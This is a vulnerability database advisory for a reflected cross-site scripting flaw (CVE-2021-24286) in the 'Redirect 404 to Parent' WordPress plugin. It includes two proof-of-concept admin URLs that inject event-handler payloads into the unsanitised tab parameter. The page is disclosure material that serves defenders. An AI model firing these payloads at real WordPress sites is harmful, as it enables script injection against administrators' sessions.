Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWpvulndbWPEX-ID:B9A535F3-CB0B-46FE-B345-DA3462584E27
HistoryApr 23, 2021 - 12:00 a.m.

Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting (XSS)

2021-04-2300:00:00
wpvulndb
85
JSON

The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue

https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab=" onMouseOver="alert(1);

https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab="+style%3D"animation-name%3Aspinner"+onanimationstart%3D"alert(%2FXSS%2F)

Related

patchstack 1
prion 1
zdt 1
packetstorm 1
wpvulndb 1
cve 1
nuclei 1
exploitdb 1
patchstack
patchstack
WordPress Redirect 404 to parent plugin <= 1.3.0 - Reflected Cross-Site Scripting (XSS) vulnerability
2021-04-23 00:00:00
prion
prion
Cross site scripting
2021-05-14 12:15:00
zdt
zdt
WordPress Redirect 404 to Parent 1.3.0 Plugin - Reflected Cross-Site Scripting Vulnerability
2021-09-29 00:00:00
packetstorm
packetstorm
WordPress Redirect 404 To Parent 1.3.0 Cross Site Scripting
2021-09-29 00:00:00
wpvulndb
wpvulndb
Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting (XSS)
2021-04-23 00:00:00
cve
cve
CVE-2021-24286
2021-05-14 12:15:00
nuclei
nuclei
WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
2023-10-17 07:20:28
exploitdb
exploitdb
WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting
2021-09-29 00:00:00
JSON
Related for WPEX-ID:B9A535F3-CB0B-46FE-B345-DA3462584E27
patchstack1prion1zdt1packetstorm1wpvulndb1cve1nuclei1exploitdb1